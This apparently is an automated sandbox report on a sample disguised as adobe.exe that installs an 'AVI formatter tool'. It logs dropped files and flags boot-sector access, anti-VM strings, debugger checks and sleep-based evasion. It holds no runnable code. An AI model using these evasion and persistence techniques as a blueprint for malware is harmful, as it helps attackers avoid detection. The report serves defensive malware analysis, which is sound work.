                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-R0SOB.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-JAMVB.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\d_writer.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\Temp\is-6RNA5.tmp\_isetup\_isdecmp.dllJump to dropped file
                Source: C:\Users\user\Desktop\adobe.exeFile created: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-CHQ62.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\Temp\is-6RNA5.tmp\_isetup\_iscrypt.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-RTU9Q.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-5EUCF.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-5PBSD.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeFile created: C:\ProgramData\JSON Nested Objects 66\JSON Nested Objects 66.exeJump to dropped file

                Boot Survival

                barindex
                Contains functionality to infect the boot sector
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeCode function: CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive02_2_00401A4F
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeCode function: CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive03_2_00401A4F
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeCode function: CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive03_2_02A1F823
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeCode function: 2_2_0040219E StartServiceCtrlDispatcherA,2_2_0040219E
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,1_2_00423C1C
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,1_2_00423C1C
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_004241EC IsIconic,SetActiveWindow,SetFocus,1_2_004241EC
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_004241A4 IsIconic,SetActiveWindow,1_2_004241A4
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_00418394 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,1_2_00418394
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_0042286C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,1_2_0042286C
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_004175A8 IsIconic,GetCapture,1_2_004175A8
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_00417CDE IsIconic,SetWindowPos,1_2_00417CDE
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_00417CE0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,1_2_00417CE0
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_00481EB4 IsIconic,GetWindowLongA,ShowWindow,ShowWindow,1_2_00481EB4
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_0044AEAC LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_0044AEAC
                Source: C:\Users\user\Desktop\adobe.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,2_2_00401B4B
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,3_2_00401B4B
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,3_2_02A1F927
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeWindow / User API: threadDelayed 9668Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-P1JK8.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\libFLAC_dynamic.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\libwebp.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-LAMVM.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\da.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-N9KV6.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-GDO6P.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\plugins\internal\is-29FOL.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\plugins\internal\peak_scanner_plugin_c.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-QIBJG.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\basscd.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\sd.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-6RNA5.tmp\_isetup\_RegDLL.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\daiso.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\basswv.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bass_tta.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bassopus.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\dsd2.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\plugins\internal\raw_decode_plugin_c.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\tak_deco_lib.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-GV1D3.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-OJAID.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\libsoxr.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-62TD5.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\dstt.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-G867L.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-2NPHT.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-6BR28.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-NLBLP.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-DGTCL.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-G2Q7A.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bassmidi.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\dsd2pcmt.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\basswma.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bass_ofr.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\rg_ebur128.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\pcm2dsd.exe (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\gain_analysis.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-O3BDJ.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\mp3gain.exe (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\7z.exe (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-USOE1.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-B5I6T.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-TS18M.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\uchardet.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-ETIM8.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\OptimFROG.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bassmix.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\wavpackdll.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-6RNA5.tmp\_isetup\_shfoldr.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-SD2K4.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\plugins\internal\is-H7480.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-1V9NR.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-G9QV0.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-6RNA5.tmp\_isetup\_setup64.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\takdec.exe (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\is-D26SF.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-L5R6H.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-M7I8F.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-JAAP8.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\lame_enc.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\libdtsdec.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\ff_helper.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\unins000.exe (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bass_fx.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-7MMUT.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-TA1T4.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\utils.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-B8D2L.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\libwinpthread-1.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-268GJ.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bassflac.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-R0SOB.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-JAMVB.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\d_writer.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-6RNA5.tmp\_isetup\_isdecmp.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-5EUCF.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-CHQ62.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-RTU9Q.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-5PBSD.tmpJump to dropped file
                Source: C:\Users\user\Desktop\adobe.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-5550
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_2-2476
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe TID: 7404Thread sleep count: 116 > 30Jump to behavior
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe TID: 7404Thread sleep time: -232000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe TID: 7904Thread sleep count: 107 > 30Jump to behavior
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe TID: 7904Thread sleep time: -6420000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe TID: 7404Thread sleep count: 9668 > 30Jump to behavior
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe TID: 7404Thread sleep time: -19336000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeFile opened: PhysicalDrive0Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_00474078 FindFirstFileA,FindNextFileA,FindClose,1_2_00474078
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_004520D0 FindFirstFileA,GetLastError,1_2_004520D0
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_0049676C FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_0049676C
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_00463504 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463504
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_00463980 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463980
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_00461F78 FindFirstFileA,FindNextFileA,FindClose,1_2_00461F78
                Source: C:\Users\user\Desktop\adobe.exeCode function: 0_2_00409B30 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,0_2_00409B30
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeThread delayed: delay time: 60000Jump to behavior
                Source: aviformattertool.exe, 00000003.00000002.2905592676.0000000003300000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW5
                Source: aviformattertool.exe, 00000003.00000002.2904440169.00000000007D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
                Source: aviformattertool.exe, 00000003.00000002.2904440169.00000000008C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: C:\Users\user\Desktop\adobe.exeAPI call chain: ExitProcess graph end nodegraph_0-6682
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeAPI call chain: ExitProcess graph end nodegraph_2-2866
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeAPI call chain: ExitProcess graph end nodegraph_3-18143
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeAPI call chain: ExitProcess graph end nodegraph_3-17872
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeCode function: 3_2_02A3013E RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,3_2_02A3013E
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeCode function: 3_2_02A3013E RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,3_2_02A3013E
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_0044C030 LoadLibraryA,GetProcAddress,GetProcAddress,1_2_0044C030
